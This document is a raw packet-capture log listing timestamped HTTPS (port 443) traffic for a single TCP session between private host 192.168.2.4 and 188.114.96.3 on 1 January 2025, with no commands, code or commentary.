Jan 1, 2025 17:10:05.423495054 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.423532009 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.423567057 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.423573971 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.423605919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.423661947 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.470670938 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.470715046 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.470746040 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.470753908 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.470887899 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.470983028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.471033096 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.471065044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.471071005 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.471098900 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.471194983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.471199036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.471213102 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.471236944 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.471271038 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.471277952 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.471303940 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.471369982 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.471499920 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.471582890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.472918034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.472946882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.472980976 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.472986937 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.473017931 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.512407064 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.512453079 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.512489080 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.512496948 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.512526989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.512573957 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.512615919 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.512717962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.512723923 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.512875080 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.512916088 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.512948036 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.512955904 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.512983084 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.513026953 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.513250113 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.513314962 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.513348103 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.513353109 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.513381958 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.513464928 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.513951063 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.513987064 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.514017105 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.514023066 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.514049053 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.514286995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.514326096 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.514353991 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.514358997 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.514386892 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.561398983 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.561469078 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.561508894 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.561523914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.561562061 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.561650991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.561717033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.561753035 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.561758995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.561785936 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.561953068 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.561971903 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.562010050 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.562017918 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.562052011 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.563467026 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.563481092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.563590050 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.563597918 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.603178024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.603197098 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.603447914 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.603457928 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.603517056 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.603574038 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.603585005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.603590012 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.603648901 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.603648901 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.603957891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.604001999 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.604032993 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.604038000 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.604070902 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.604314089 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.604543924 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.604630947 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.604670048 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.604675055 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.604716063 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.604724884 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.604762077 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.604768991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.604789972 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.651812077 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.651830912 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.651937962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.651937962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.651957035 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.652139902 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.652196884 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.652230978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.652267933 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.652273893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.652303934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.652530909 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.652620077 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.652657986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.652688980 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.652693033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.652721882 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.693515062 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.693532944 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.693763018 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.693802118 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.693814039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.693850040 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.693880081 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.693914890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.693921089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.693949938 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.694010973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.694042921 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.694051027 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.694078922 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.694349051 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.694382906 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.694386005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.694395065 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.694416046 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.694883108 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.694897890 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.694924116 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.694933891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.694946051 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.694960117 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.695341110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.695354939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.695382118 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.695393085 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.695422888 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.695422888 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.697431087 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.697520971 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.742593050 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.742611885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.742708921 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.742708921 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.742722988 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.742769003 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.742908001 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.742924929 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.743045092 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.743052006 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.743180990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.743304968 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.743328094 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.743364096 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.743370056 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.743397951 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.743500948 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.784315109 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.784334898 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.784413099 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.784431934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.784446955 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.784588099 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.784603119 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.784609079 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.784621954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.784693003 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.785089016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.785104036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.785201073 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.785209894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.785382032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.785397053 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.785473108 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.785473108 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.785485983 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.785938978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.785953045 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.786037922 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.786037922 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.786046982 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.786134005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.834693909 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.834711075 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.834800005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.834800005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.834810019 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.835046053 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.835128069 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.835143089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.835222006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.835230112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.835853100 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.835871935 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.835911989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.835918903 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.835947037 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.835978985 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.837080002 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.837122917 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.837162018 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.837167978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.837196112 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.837250948 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.877984047 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878010988 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878093958 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878093958 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878103971 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878117085 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878154039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878165960 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878170013 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878197908 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878238916 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878257990 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878272057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878302097 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878340006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878340006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878348112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878376007 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878587961 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878628016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878645897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878662109 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878667116 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878679037 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878695965 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878695965 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878704071 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878772974 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878778934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878840923 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.878884077 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.878953934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.923839092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.923860073 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.924097061 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.924109936 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.924149036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.924184084 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.924187899 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.924201965 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.924228907 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.924345970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.924393892 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.924401045 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.924426079 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.924448967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.924479008 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.924777985 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.924784899 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.925518036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.925653934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.925661087 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.965471983 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.965662956 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.965702057 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.965707064 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.965723038 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.965734005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966065884 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966070890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966089964 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966118097 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966155052 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966162920 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966176033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966193914 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966239929 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966247082 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966398954 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966610909 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966628075 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966703892 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966703892 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966712952 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966749907 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966777086 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966783047 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966813087 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966844082 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966849089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966877937 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.966942072 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.966975927 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.967005968 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.967012882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.967072964 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.967272043 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.967279911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.967432022 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.967542887 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.967572927 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:05.967580080 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:05.967711926 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.019661903 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.019782066 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.019823074 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.019823074 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.019836903 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.019856930 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.019942999 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.019987106 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.019993067 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.020023108 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.020025015 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.020066023 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.020070076 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.020102978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.020215034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.020261049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.020267963 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.020292997 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.056041002 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.056086063 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.056121111 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.056134939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.056255102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.056546926 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.056596041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.056628942 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.056636095 CET	443	49733	188.114.96.3	192.168.2.4
